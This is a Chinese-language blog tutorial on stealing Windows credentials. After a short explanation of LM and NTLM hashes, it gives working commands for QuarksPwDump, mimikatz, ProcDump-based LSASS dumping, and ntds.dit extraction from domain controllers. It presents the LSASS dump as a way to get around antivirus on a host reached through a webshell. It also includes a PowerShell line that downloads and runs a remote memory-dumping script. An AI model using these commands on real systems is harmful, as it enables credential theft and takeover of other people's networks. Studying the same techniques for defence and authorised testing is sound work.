關於Windows系統密碼抓取

標籤：tco   must   txt   bsp   new   lease   令行   exe   版本   

 0x01 windows密碼Hash

 

     早期SMB協議在網路上傳輸明文口令。後來出現"LAN Manager Challenge/Response"驗證機制，簡稱LM，它是如此簡單以至很容易被破解。微軟提出了WindowsNT挑戰/響應驗證機制，稱之為NTLM。現在已經有了更新的NTLMv2以及Kerberos驗證體系。Windows加密過的密碼口令，我們稱之為hash（中文：雜湊），Windows的系統密碼hash預設情況下一般由兩部分組成：第一部分是LM-hash，第二部分是NTLM-hash。

     NTLM-Hash與LM-Hash演算法相比，明文口令大小寫敏感，但無法根據NTLM-Hash判斷原始明文口令是否小於8位元組，擺脫了魔術字串"[email protected]#$%"。MD4是真正的單向雜湊函數，窮舉做為資料來源出現的明文，難度較大。問題在於，微軟一味強調NTLM-Hash的強度高，卻避而不談一個事實，為了保持向後相容性，NTLM-Hash預設總是與LM-Hash一起使用的。這意味著NTLM-Hash強調再高也是無助於安全的，相反潛在損害著安全性。增加NTLM-Hash後，首先利用LM-Hash的弱點窮舉出原始明文口令的大小寫不敏感版本，再利用NTLM-Hash修正出原始明文口令的大小寫敏感版本。

 

Windows系統下的hash密碼格式為：使用者名稱稱:RID:LM-HASH值:NT-HASH值，例如：Administrator:500:C8825DB10F2590EAAAD3B435B51404EE:683020925C5D8569C23AA724774CE6CC:::表示

使用者名稱稱為：Administrator

RID為：500

LM-HASH值為：C8825DB10F2590EAAAD3B435B51404EE

NT-HASH值為：683020925C5D8569C23AA724774CE6CC

如果你知道這個使用者的hash密碼了，拿著C8825DB10F2590EAAAD3B435B51404EE:683020925C5D8569C23AA724774CE6CC去hash線上查詢網站。

 

0x02 QuarksPwDump

 

     一般用QuarksPwDump_v0.2b來抓取整個windows系列的密碼hash，將得到的hash值在http://www.objectif-securite.ch/ophcrack.php查詢。

     QuarksPwDump抓取密碼的命令如下：（其他命令可以參考軟體說明）

quarkspwdump.exe -dhl

得到的整個HASH值拿去線上破解。

 

0x03 mimikatz

 

密碼抓取神器mimikatz來測試一下，命令如下：

privilege::debug
sekurlsa::logonpasswords

圖示結果如下：

 

有沒有發現，mimikatz和QuarksPwDump抓取的LM-HASH是不同的，而且mimikatz直接就把系統密碼給取到了。NT-HASH兩款軟體得到的結果是一樣的。

 

     在滲透測試過程中會出現這樣得情境，我已經chopper連上對方主機，但是系統預設安裝了360安全衛士或其他得安全軟體。我上傳的mimikatz和QuarksPwDump都被查殺了。也就是說我想利用這兩款軟體常規思路擷取系統的密碼HASH已經是不太可能了。其實，我們可以先dump對方主機的LSASS記憶體檔案，然後在自己主機用mimikatz進行處理，這樣就可以得到對方主機的系統HASH和密碼。

     可以到微軟的官方網站下載 ProDump，這個肯定不會引起殺毒軟體的報毒和查殺了。

命令如下：

Procdump.exe -accepteula -ma lsass.exe lsass.dmp

圖示如下：

 

 

接下來，再示範一下本地用mimikatz進行破解：

首先輸入命令：

mimikatz.exe "sekurlsa::minidump lsass.dmp"

接著輸入命令：

sekurlsa::logonpasswords

可以看到，能夠得到離線得到系統密碼，這樣就可以在對方主機上繞過殺毒軟體的查殺了。

在烏雲知識庫中也有看到利用PowerShell完成Prodump一樣工作的命令。具體命令如下：

powershell IEX (New-Object Net.WebClient).DownloadString(‘https://raw.githubusercontent.com/mattifestation/PowerSploit/master/Exfiltration/Out-Minidump.ps1‘); "Get-Process lsass | Out-Minidump"

我在被滲透主機上進行嘗試過，發現也是可行的，不過chopper的虛擬終端下會顯示錯誤，實際上已經成功執行Powershell代碼。不過總體感覺還是Prodump用起來更加方便。

     Metasploit中也有整合mimkatz的。具體教程可以參考 http://www.offensive-security.com/metasploit-unleashed/Mimikatz

 

0x04 NTDSDump相關

 

受不了NTDSXTract的龜速，於是用quarkspwdump改了個能讀取system.hiv的離線版提取工具。

ntds.dit其實就是個esent資料庫，微軟本身就有一系列的文檔化api能夠操作這個資料庫。

其命令列如下：

ntdsdump.exe <-f ntds.dit> <-k HEX-SYS-KEY | -s system.hiv> [-o out.txt] [-h] [-t JOHN|LC]

-f    ntds.dit路徑

-k   可選的十六進位格式的SYSKEY

-s    可選的system.hiv路徑

-h   匯出曆史密碼記錄

-t    匯出格式，LC或JOHN

-o   匯出到指定檔案中

 

SYSKEY實際上就是HKLM\SYSTEM\CurrentControlSet\Control\Lsa下面幾個子項的類型資訊，可以用RegQueryInfoKey查詢出來。

附件裡面提供了兩個匯出工具，getsyskey_c.exe由vc6編譯，其源碼為getsyskey.cpp，用vc6直接開啟編譯即可。

getsyskey_cs.exe由.net2.0編譯，源碼為getsyskey.cs，用csc直接編譯即可。

 

已知錯誤：

JetAttachDatabase() failed

原因：資料庫需要修複，執行esentutl /p /o ntds.dit進行修複。

 

：

ntdsdump

 

另：改完之後又看了看quarkspwdump的github，發現有人提交了個pull request：https://github.com/quarkslab/quarkspwdump/pull/3

其添加了一個載入system.hiv的功能，調用了RegLoadKey。而這個API必須要過UAC才行，所以用起來還是挺彆扭的，不如這個直接讀取檔案進行處理來得痛快。

 

安全脈搏姿勢

在2008+域控上使用 ntdsutil snapshot mount匯出ntds.dit， SAM以及System ，

ntdsutilsnapshotactivate instance ntdscreatemount {GUID}copy c:\MOUNT_POINT\WINDOWS\NTDS\NTDS.dit c:\NTDS_saved.ditunmount {GUID}quitquit然後就是各種copy了

 

在域控上使用 QuarksPwDump.exe 匯出絕大部分明文:

QuarksPwDump.exe --dump-hash-domain --output SecPulseHash.txt --ntds-file c:\ntds.dit

下載回本地再用QuarksPwDump似乎就不行,主要因為本地無法指定SYSTEM檔案導致擷取不到key

 

附Quarks PWDump使用參數:

quarks-pwdump.exe <options>

       Options :

       -dhl  --dump-hash-local

       -dhdc --dump-hash-domain-cached

       -dhd  --dump-hash-domain (NTDS_FILE must be specified)

       -db   --dump-bitlocker (NTDS_FILE must be specified)

       -nt   --ntds-file FILE

       -hist --with-history (optional)

       -t    --output-type JOHN/LC (optional, if no=>JOHN)

       -o    --output FILE (optional, if no=>stdout)

       Example: quarks-pwdump.exe --dump-hash-domain --with-history

 

當然也可以把ntds.dit， SAM以及System下載回來(很多大內網 ntds就好幾G，下載回來不太科學）用某工具解密 不過感覺有點龐大，現在我們可以使用NTDSDump.exe

NTDSDump.exe -f ntds.dit -s SYSTEM -o SecPulseHash.txt

 

 

0x05 參考連結

https://www.secpulse.com/archives/6301.html

https://www.cnblogs.com/hiccup/p/4380298.html

關於Windows系統密碼抓取